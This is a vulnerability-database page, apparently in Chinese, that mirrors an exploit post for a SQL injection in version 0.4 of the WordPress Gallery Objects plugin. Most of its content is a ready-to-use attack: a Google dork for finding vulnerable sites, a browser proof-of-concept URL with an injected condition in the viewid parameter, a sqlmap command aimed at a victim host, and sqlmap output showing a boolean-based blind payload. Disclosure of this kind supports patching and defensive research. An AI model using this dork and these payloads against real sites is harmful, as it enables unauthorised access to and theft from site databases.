Wordpress Gallery Objects Version 0.4 SQL Injection vulnerability - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1721214 漏洞类型
发布时间 2019-08-30 更新时间 2019-08-30
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019080155
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# Wordpress Gallery Objects Version 0.4 SQL Injection vulnerability



Exploit Author :  AmirMomeni



Tested on : 

Windows 7 / Mozilla Firefox

Windows 7 / sqlmap (0.8-1)

Linux / Mozilla Firefox

Linux / sqlmap 1.0-dev-5b2ded0



===================================================#

Dork Google :  inurl:/admin-ajax.php?action=go_view_object

                 

 Poc via Browser:

 http://VICTIM/wp-admin/admin-ajax.php?action=go_view_object&viewid=1[ and 1=2]&type=html



sqlmap : 

sqlmap -u "http://VICTIM/wp-admin/admin-ajax.php?action=go_view_object&viewid=1&type=html" -p viewid



---

Place: GET

Parameter: viewid

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: action=go_view_object&viewid=475 AND 7403=7403&type=html

---

=====================================================#